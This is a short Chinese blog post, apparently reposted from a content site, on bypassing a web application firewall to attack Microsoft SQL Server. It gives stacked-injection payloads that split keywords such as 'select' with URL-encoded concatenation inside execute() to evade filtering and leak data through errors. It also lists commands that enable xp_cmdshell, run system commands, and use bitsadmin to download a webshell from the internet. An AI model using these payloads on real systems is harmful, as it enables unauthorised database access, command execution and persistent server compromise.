MSSQL WAF绕过(2)

MSSQL WAF绕过(2)

0x00 前言

上次的绕过太简单，也没有能注出数据或者获取权限，这次继续绕过，获取数据

0x01 过程

execute('sql语句') //execute函数中可以写sql语句，且为字符串，那么就可以传入一些变形字符串来绕过waf

只是本次使用sql server堆叠注入，并不会将数据展示在页面，所以要让这一次的堆叠出错，达到报错注入的效果

execute('select convert(int,@@version)') --a

当然需要变形一下，不然会被拦截，因为出现了select

execute('sel'%2b'ect convert(int,@@version)') --a //在url编码中 %2b 等价与 + 所以可以理解为 'sel' + 'ect'

通过execute函数，可进行变形导致waf无法拦截，获取数据或执行sql语句就变得简单多了执行cmdshell，由于cmdshell不能通过报错回显，但是可以将结果重定向到文件中或写入表中

execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt') // 双斜杠被过滤

0x02 后续

0x03 其他

附上其他在这次测试中用到的命令

execute('sp_configure "show advanced options",1') execute('reconfigure') execute('sp_configure "xp_cmdshell", 1') execute('reconfigure') //上述四步，使xp_cmdshell开启 execute('master..xp_cmdshell "bitsadmin /transfer n c:\\路径\\123.aspx"') //从公网下载webshell，本文中因机器不能出外网导致下载失败

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。